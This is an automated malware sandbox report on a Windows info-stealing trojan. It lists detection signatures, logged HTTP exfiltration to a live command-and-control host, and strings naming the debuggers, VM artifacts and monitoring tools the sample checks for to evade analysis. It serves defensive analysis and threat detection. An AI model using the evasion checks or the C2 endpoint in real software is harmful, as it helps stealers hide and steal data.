
Windows Analysis Report
HrIrtCXI3s.exe

Overview

General Information

Sample name: HrIrtCXI3s.exe (renamed because the original name is a hash value)
Original sample name: 629763eb39d91bb69848475c90ad1e63.exe
Analysis ID: 1580954
MD5: 629763eb39d91bb69848475c90ad1e63
SHA1: dc7b1a7b530dc7c8a22e50836ad747483b06bf3e
SHA256: b493e279c1d18ac53caeca4e865c658c25f256fda1be8a5d9ef33184e67497e0
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HrIrtCXI3s.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\HrIrtCXI3s.exe" MD5: 629763EB39D91BB69848475C90AD1E63)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: HrIrtCXI3s.exe | Avira: detected
Source: HrIrtCXI3s.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: HrIrtCXI3s.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_004FDCF0
Source: HrIrtCXI3s.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: HrIrtCXI3s.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_004D255D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_004D29FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 503853 Data Raw: (hex dump of the JSON request body omitted)
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1 Host: home.fiveth5ht.top Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D7770 recv, 0_2_004D7770
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1 Host: home.fiveth5ht.top Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 503853 Data Raw: (hex dump of the JSON request body omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Thu, 26 Dec 2024 13:14:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Thu, 26 Dec 2024 13:14:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l-
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: HrIrtCXI3s.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: HrIrtCXI3s.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: HrIrtCXI3s.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: HrIrtCXI3s.exe | Static PE information: section name:
Source: HrIrtCXI3s.exe | Static PE information: section name: .idata
Source: HrIrtCXI3s.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0195735D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_01976E60
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0059B180
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E05B0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E6FA0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0085A000
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E10E6
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_005A00E0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0085E050
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00536210
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0059C320
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_005A0420
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0083D430
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_008435B0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004DE620
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00854780
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_008617A0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0059C770
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00836730
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00589880
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E4940
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004DA960
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0058C900
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00829920
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_006A6AC0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00853A70
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00841BD0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00848BF0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00511BE0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004DCBB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0085CC90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00837CC0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0084CD80
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00854D40
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00690D80
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E5DB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_007EAE30
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004E3ED0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004F5EB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00822F90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004F4F70
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0059EF90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00598F90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004D75A0 appears 529 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 006ACBC0 appears 95 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 005150A0 appears 31 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 005B44A0 appears 72 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004DCAA0 appears 41 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004D71E0 appears 42 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 00514FD0 appears 200 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 00687220 appears 88 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004ECD40 appears 40 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 00515340 appears 39 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 00514F40 appears 198 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004ECCD0 appears 39 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: String function: 004D73F0 appears 86 times
Source: HrIrtCXI3s.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: HrIrtCXI3s.exe | Static PE information: Section: lqffkoae ZLIB complexity 0.9943955732122588
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_004D255D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D31D7 CreateToolhelp32Snapshot,CloseHandle, 0_2_004D31D7
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: HrIrtCXI3s.exe | ReversingLabs: Detection: 39%
Source: HrIrtCXI3s.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: HrIrtCXI3s.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Section loaded: kernel.appcore.dll
Source: HrIrtCXI3s.exe | Static file information: File size 4476416 > 1048576
Source: HrIrtCXI3s.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x288a00
Source: HrIrtCXI3s.exe | Static PE information: Raw size of lqffkoae is bigger than: 0x100000 < 0x1b8800

Data Obfuscation

Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Unpacked PE file: 0.2.HrIrtCXI3s.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lqffkoae:EW;wsxqcczr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lqffkoae:EW;wsxqcczr:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: HrIrtCXI3s.exe | Static PE information: real checksum: 0x44c8ab should be: 0x453aa9
Source: HrIrtCXI3s.exe | Static PE information: section name:
Source: HrIrtCXI3s.exe | Static PE information: section name: .idata
Source: HrIrtCXI3s.exe | Static PE information: section name:
Source: HrIrtCXI3s.exe | Static PE information: section name: lqffkoae
Source: HrIrtCXI3s.exe | Static PE information: section name: wsxqcczr
Source: HrIrtCXI3s.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_01971417 push ss; retn 000Eh 0_3_01971512
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0195CC00 push eax; ret 0_3_0195CC01
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0197ACD2 push ebx; ret 0_3_0197AD78
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0197D51B push cs; iretd 0_3_0197D562
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0196E8BC push 400196CBh; retf 0_3_0196E8C1
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_0197D563 push cs; retf 000Eh 0_3_0197D57A
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_008541D0 push eax; mov dword ptr [esp], edx 0_2_008541D5
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00531430 push eax; mov dword ptr [esp], 00000000h 0_2_00531433
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_0058C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0058C743
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_005539A0 push eax; mov dword ptr [esp], 00000000h 0_2_005539A3
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00510AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00510AC4
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_00859F40 push dword ptr [eax+04h]; ret 0_2_00859F6F
Source: HrIrtCXI3s.exe | Static PE information: section name: lqffkoae entropy: 7.954980284330732

Boot Survival

Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2EA9F second address: D2EAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCAD728Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jnl 00007FFBBCAD728Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2EAC3 second address: D2EAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFBBCD95556h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2EAF9 second address: D2EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DB68 second address: D2DB8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBBCD9555Bh 0x00000008 jmp 00007FFBBCD95555h 0x0000000d jbe 00007FFBBCD9554Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DCA7 second address: D2DCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFBBCAD7298h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 jns 00007FFBBCAD7286h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DE31 second address: D2DE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DE37 second address: D2DE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DFB9 second address: D2DFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFBBCD9555Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D2DFDE second address: D2DFF6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBBCAD7288h 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FFBBCAD7286h 0x00000010 js 00007FFBBCAD7286h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30A5D second address: D30A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30A61 second address: D30A7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBBCAD7290h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30AFF second address: D30B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30B0C second address: D30B12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: D30B12 second address: D30B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a jmp 00007FFBBCD9554Ah 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 je 00007FFBBCD95554h 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007FFBBCD95546h 0x00000032 rdtsc
